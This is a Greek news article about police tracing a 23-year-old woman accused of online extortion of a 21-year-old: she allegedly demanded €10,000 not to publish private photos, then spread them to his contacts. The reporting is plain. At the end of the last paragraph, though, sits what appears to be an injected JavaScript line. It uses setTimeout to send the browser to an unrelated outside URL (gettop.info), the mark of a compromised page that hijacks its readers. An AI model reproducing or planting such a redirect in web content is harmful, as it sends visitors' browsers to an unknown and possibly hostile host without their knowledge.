Εκβίαζαν 21χρονο μέσω διαδικτύου

0
4

 

Μία 23χρονη Πολωνή κρύβεται πίσω από τον εκβιασμό ενός 21χρονου μέσω διαδικτύου στα ίχνη της οποίας έφθασε η Διεύθυνση Δίωξης Ηλεκτρονικού Εγκλήματο έπειτα από καταγγελία του νεαρού.

Όπως κατήγγειλε ο 21χρονος, άγνωστο άτομο τον προσέγγισε και είχαν συνομιλίες μέσω social media απoκαλύπτοντάς του ότι έχει την κατοχή του προσωπικό φωτογραφικό υλικό απαιτώντας μάλιστα 10.000 €, ώστε να μην το δημοσιεύσει.

Ο νεαρός κατήγγειλε ότι το άτομο αυτό δημοσίευσε το επίμαχο φωτογραφικό υλικό σε ιστοσελίδα κοινωνικής δικτύωσης και σε οικείους του, μέσω εφαρμογής αποστολής προσωπικών μηνυμάτων.

Από την αστυνομική διαδικτυακή έρευνα που ακολούθησε εντοπίστηκαν τα επίμαχα ηλεκτρονικά ίχνη και ταυτοποιήθηκε η εμπλοκή της 23χρονης, η οποία κατηγορείται για εκβίαση και κατ’ εξακολούθηση παραβίαση της νομοθεσίας για τα προσωπικά δεδομένα σε βάρος 21χρονου.

Σε έρευνα που πραγματοποιήθηκε στην κατοικία της, σε περιοχή της Πελοποννήσου, παρουσία δικαστικού λειτουργού, βρέθηκαν και κατασχέθηκαν δύο φορητοί ηλεκτρονικοί υπολογιστές και tablet, τα οποία θα αποσταλούν στη Διεύθυνση Εγκληματολογικών Ερευνών, για εργαστηριακές εξετάσεις. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here